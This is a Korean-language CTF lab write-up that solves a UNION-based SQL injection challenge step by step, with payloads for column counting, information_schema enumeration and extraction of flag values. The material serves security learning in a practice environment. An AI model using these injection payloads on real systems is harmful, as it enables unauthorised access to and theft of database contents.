[SegFault] (SQLi) - SQL Injection 2

[SegFault] (SQLi)

SQL Injection 2.

진짜! 데이터를 찾아랏!

문제 파악

위의 페이지에 들어가면 다음과 같은 창이 나온다.

우선 검색창에 대하여 입력 테스트를 진행해본다.

 

SQL 구조 확인

우선 placeholder로 존재하는 normaltic을 입력해본다.

위와 같은 결과가 나오는 것을 확인했는데 여기서 부분적으로 입력했을 때도 결과가 나오는지 확인해본다.

결과가 완전히 동일하지는 않지만 결과가 나오는 것을 확인할 수 있다.

 

SQLi 가능 여부 확인

normaltic%' and '1%'='1

 

SQL Injection이 가능한 것을 확인 했으므로 UNION SQLi 의 진행 절차에 따라 진행한다.

---

풀이 과정 (해결 방안)

1. SQL Injection 가능 여부 판단

위에서 확인했기 때문에 넘어간다.

 

2. Column 개수 파악하기

order by를 이용하여 1부터 대입 해본다.

normaltic%'order by 1~6  # 까지는 결과가 나온다.

7부터는 안되는 것을 확인하였고, 컬럼이 총 6개임을 확인하였다.

 

3. 출력되는 Column의 위치 찾기

어떤 Column이 어느 부분에서 출력되는지 확인해야 한다.

normaltic%' union select 1,2,3,4,5,6 #

 

위의 결과를 바탕으로 Info 부분에 6번째 컬럼이 나타나고 있음을 확인하였다. 다른 컬럼들은 출력되지 않는 것으로 본인다.

ID | Level | Rank Point | Info
    |           |                    |   6

공격 Format 설정

본 문제의 경우 1~6의 컬럼 중 6번째만 나오므로 해당 위치에 원하는 SQL을 삽입하면 된다.

normaltic%' union select 1,2,3,4,5,_____ #

 

4. DB 이름 확인하기

어떤 TABLE과 COLUMN이 있는지 알아내기 위해 어떤 DB가 존재하는지 부터 확인해야 한다.

SELECT database()

 

normaltic%' union select 1,2,3,4,5,database() #

database() : sqli_5

 

5. Table 이름 확인하기

어떤 DB에 들어있는지 확인했으니 어떤 COLUMN이 있는지 학인하기 위해 어떤 TABLE이 있는지 확인해야 한다.

그 전에 몇 개의 TABLE을 가지고 있는지 확인하는 것을 우선시 한다.

count(TABLE_NAME)

 

' union select 1,2,3,4,5, count(TABLE_NAME) from information_schema.TABLES  #

64

위의 결과 총 64개의 table이 존재한다는 것을 확인할 수 있었다.

컬럼의 경우 0부터 시작하기 때문에  0 ~ 63 의 64개로 구성되어 있다는 것을 생각해야한다.

limit를 이용하여 각각의 이름을 확인해보면 다음과 같다.

' union select 1,2,3,4,5,table_name from information_schema.tables limit (0~63),1#

(phpmyadmin에서 보면 기본적으로 생성되는 테이블이 61개)

추가된 2개 -> 61 + 2 = 63개

00 : CHARACTER_SETS
01 : COLLATIONS
02 : COLLATION_CHARACTER_SET_APPLICABILITY
03 : COLUMNS
04 : COLUMN_PRIVILEGES
05 : ENGINES
06 : EVENTS
07 : FILES
08 : GLOBAL_STATUS
09 : GLOBAL_VARIABLES
10 : KEY_COLUMN_USAGE
11 : OPTIMIZER_TRACE
12 : PARAMETERS
13 : PARTITIONS
14 : PLUGINS
15 : PROCESSLIST
16 : PROFILING
17 : REFERENTIAL_CONSTRAINTS
18 : ROUTINES
19 : SCHEMATA
20 : SCHEMA_PRIVILEGES
21 : SESSION_STATUS
22 : SESSION_VARIABLES
23 : STATISTICS
24 : TABLES
25 : TABLESPACES
26 : TABLE_CONSTRAINTS
27 : TABLE_PRIVILEGES
28 : TRIGGERS
29 : USER_PRIVILEGES
30 : VIEWS
31 : INNODB_LOCKS
32 : INNODB_TRX
33 : INNODB_SYS_DATAFILES
34 : INNODB_FT_CONFIG
35 : INNODB_SYS_VIRTUAL
36 : INNODB_CMP
37 : INNODB_FT_BEING_DELETED
38 : INNODB_CMP_RESET
39 : INNODB_CMP_PER_INDEX
40 : INNODB_CMPMEM_RESET
41 : INNODB_FT_DELETED
42 : INNODB_BUFFER_PAGE_LRU
43 : INNODB_LOCK_WAITS
44 : INNODB_TEMP_TABLE_INFO
45 : INNODB_SYS_INDEXES
46 : INNODB_SYS_TABLES
47 : INNODB_SYS_FIELDS
48 : INNODB_CMP_PER_INDEX_RESET
49 : INNODB_BUFFER_PAGE
50 : INNODB_FT_DEFAULT_STOPWORD
51 : INNODB_FT_INDEX_TABLE
52 : INNODB_FT_INDEX_CACHE
53 : INNODB_SYS_TABLESPACES
54 : INNODB_METRICS
55 : INNODB_SYS_FOREIGN_COLS
56 : INNODB_CMPMEM
57 : INNODB_BUFFER_POOL_STATS
58 : INNODB_SYS_COLUMNS
59 : INNODB_SYS_FOREIGN
60 : INNODB_SYS_TABLESTATS
61 : flag_honey
62 : gam_user
63 : secret
64 - 더 이상 없음

일반적으로는 이렇지만, 본 문제에서는 어떤 DB에 존재하는지 알고 있기 때문에 간편하게 가능하다.

normaltic%' union select 1,2,3,4,5,count(table_name) from information_schema.tables where table_schema = 'sqli_5' #

앞의 경우는 해당 DB 전체의 TABLE을 조회한것인데 sqli_5에 존재하는 것만 알면 되므로 위와 같이 확인할 수 있고, 결과는 다음과 같다.

sqli_5에는 총 3개의 TABLE이 존재한다는 것을 알 수 있고, 이를 limit을 이용하여 하나씩 확인해준다. (0~2)

(본 문제의 경우 한줄씩 밖에 출력되지 않기 때문에 사전에 개수를 세주고(COUNT) 한줄씩 출력하여(limit) 확인해줘야 한다.)

normaltic%' union select 1,2,3,4,5,table_name from information_schema.tables where table_schema = 'sqli_5' limit 0,1 #

 

첫번째 TABLE은 flag_honey 이다.

normaltic%' union select 1,2,3,4,5,table_name from information_schema.tables where table_schema = 'sqli_5' limit 1,1 #

 

두번째 TABLE는 game_user 이다.

normaltic%' union select 1,2,3,4,5,table_name from information_schema.tables where table_schema = 'sqli_5' limit 2,1 #

 

마지막으로 세번째 TABLE는 secret이다.

 

6. Column 이름 확인

위에서 어떤 TABLE들이 존재하는지 확인하였기 때문에 내부에 어떤 COLUMN이 존재하는지 확인해야 한다.

본 문제의 경우 한줄씩 밖에 출력되지 않으므로 각 TABLE에 존재하는 COLUMN의 개수도 사전에 확인하는 것이 좋아 보인다.

존재하는 TABLE

flag_honey
game_user
secret

우선 flag_honey 부터 확인해보자.

flag_honey에는 하나의 COLUMN 밖에 존재하지 않는다.

normaltic%' union select 1,2,3,4,5,column_name from information_schema.columns where table_name = 'flag_honey' #

flag

다음은 game_user 를 확인해본다.

' union select 1,2,3,4,5, count(column_name) from information_schema.columns where table_name = 'gam_user' #

0

game_user TABLE에는 COLUMN이 존재하지 않는다는 것을 확인할 수 있었다.

다음은 마지막으로 secret TABLE를 확인해봐야한다.

' union select 1,2,3,4,5, count(column_name) from information_schema.columns where table_name = 'secret' #

1

컬럼이 내부에 1개만 존재한다는 것을 확인했다.

' union select 1,2,3,4,5,column_name from information_schema.columns where table_name = 'secret' #

flag

각각의 TABLE 내부에 존재하는 COLUMN을 확인해본 결과 flag_honey, secret 이렇게 두개의 TABLE에 flag라는 COLUMN이 존재하는 것을 확인하였고 이 두개의 COLUMN중 하나의 내부에 원하는 flag가 있을 것으로 예상된다.

 

7. 데이터 출력

이제 위에서 확인한 flag_honey와 secret 두개의 TABLE 내부의 flag에서 데이터를 출력해보자.

먼저 각 COLUMN 내부에 몇개의 데이터가 있는지 확인해본다.

flag_honey 부터 확인해본다.

1개의 데이터가 존재하는 것을 확인했다. 데이터를 출력해보자.

normaltic%' union select 1,2,3,4,5,flag from flag_honey #

kkkkkkk_Not Here!

함정 카드였다. 앞서서 TABLE과 COLUMN들의 개수를 확인하지 않고 왔다면 다시 처음으로 돌아가는 수준의 반복작업을 해야했다. 사전에 개수를 확인하면서 오는 것의 중요성을 확인하는 순간이다.

다음은 secret COLUMN 내부의 데이터 개수를 확인해보자.

normaltic%' union select 1,2,3,4,5,count(flag) from secret #

2

secret COLUMN에는 2개의 데이터가 존재하는 것을 확인했다. 차례대로 출력해보자.

normaltic%' union select 1,2,3,4,5,flag from secret #

NONONO~~~~

첫번째 데이터는 더미 데이터였다. 마지막 두번째 데이터를 확인해보자.

normaltic%' union select 1,2,3,4,5,flag from secret limit 1,1#

해당 데이터가 원하는 flag 데이터였다.

---

생각해볼 점

본 문제와 같이 출력되는 줄 수에 대한 제한이 있는 경우가 있을 수 있다.
그렇기 때문에 무턱대고 확인하는 것이 아니라, 각각의 TABLE, COLUMN, DATA의 개수를 세는 것(COUNT)이 귀찮더라도, 오히려 앞에서 부터 확인하면서 오는 것이 뒤로 돌아가는 불상사를 일으키지 않고 확실하게 확인하는 방법이라는 것을 생각해야 한다.

---

질문 환영, 수정 및 보완에 대한 지적 환영